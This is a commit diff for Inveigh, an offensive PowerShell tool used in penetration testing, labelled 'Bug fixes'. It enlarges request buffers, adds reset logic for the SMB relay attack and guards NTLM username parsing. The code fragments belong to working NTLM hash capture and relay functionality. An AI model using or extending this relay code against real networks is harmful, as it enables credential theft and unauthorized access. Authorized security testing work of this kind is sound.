diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2017-02-22 21:28:27 -0500 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-02-22 21:28:27 -0500 |
| commit | 3e2fd57ba1c162d52b6406d4ec41f556bf5c5568 (patch) | |
| tree | c8e325206bc3279f7ab709ebda79bc5c5d4e95c3 | |
| parent | 475f82d7b3dffd36a913a14bd4073ec472c430f2 (diff) | |
| download | Inveigh-3e2fd57ba1c162d52b6406d4ec41f556bf5c5568.tar.gz Inveigh-3e2fd57ba1c162d52b6406d4ec41f556bf5c5568.zip | |
Bug fixes
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 36 | ||||
| -rw-r--r-- | Scripts/Inveigh-Unprivileged.ps1 | 2 |
2 files changed, 32 insertions, 6 deletions
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index ef5d74a..1dd1538 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -2367,8 +2367,8 @@ $HTTP_scriptblock = :HTTP_listener_loop while ($inveigh.relay_running -and $HTTP_running) { $TCP_request = "" - $TCP_request_bytes = New-Object System.Byte[] 1024 - + $TCP_request_bytes = New-Object System.Byte[] 4096 + while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) { Start-Sleep -m 10 @@ -2379,6 +2379,24 @@ $HTTP_scriptblock = } } + + if($relay_step -gt 0) + { + $relay_reset++ + + if($relay_reset -gt 1) + { + $inveigh.console_queue.Add("SMB relay attack resetting") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")]) + $SMB_relay_socket.Close() + $relay_step = 0 + } + + } + else + { + $relay_reset = 0 + } if($SSL) { @@ -2578,11 +2596,20 @@ $HTTP_scriptblock = $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + + if($HTTP_NTLM_user_length -gt 0) + { + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + } + else + { + $HTTP_NTLM_user_string = "" + } + $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes - + if($HTTP_NTLM_length -eq 24) # NTLMv1 { $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" @@ -2650,7 +2677,6 @@ $HTTP_scriptblock = $NTLM_auth = $true $HTTP_client_close = $true $NTLM_challenge = "" - #$HTTP_raw_url_output = $true if($inveigh.SMB_relay -and $relay_step -eq 2) { diff --git a/Scripts/Inveigh-Unprivileged.ps1 b/Scripts/Inveigh-Unprivileged.ps1 index 3fe5dd7..991a8eb 100644 --- a/Scripts/Inveigh-Unprivileged.ps1 +++ b/Scripts/Inveigh-Unprivileged.ps1 @@ -858,7 +858,7 @@ $HTTP_scriptblock = :HTTP_listener_loop while ($inveigh.unprivileged_running -and $HTTP_running) { $TCP_request = "" - $TCP_request_bytes = New-Object System.Byte[] 1024 + $TCP_request_bytes = New-Object System.Byte[] 4096 while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) { |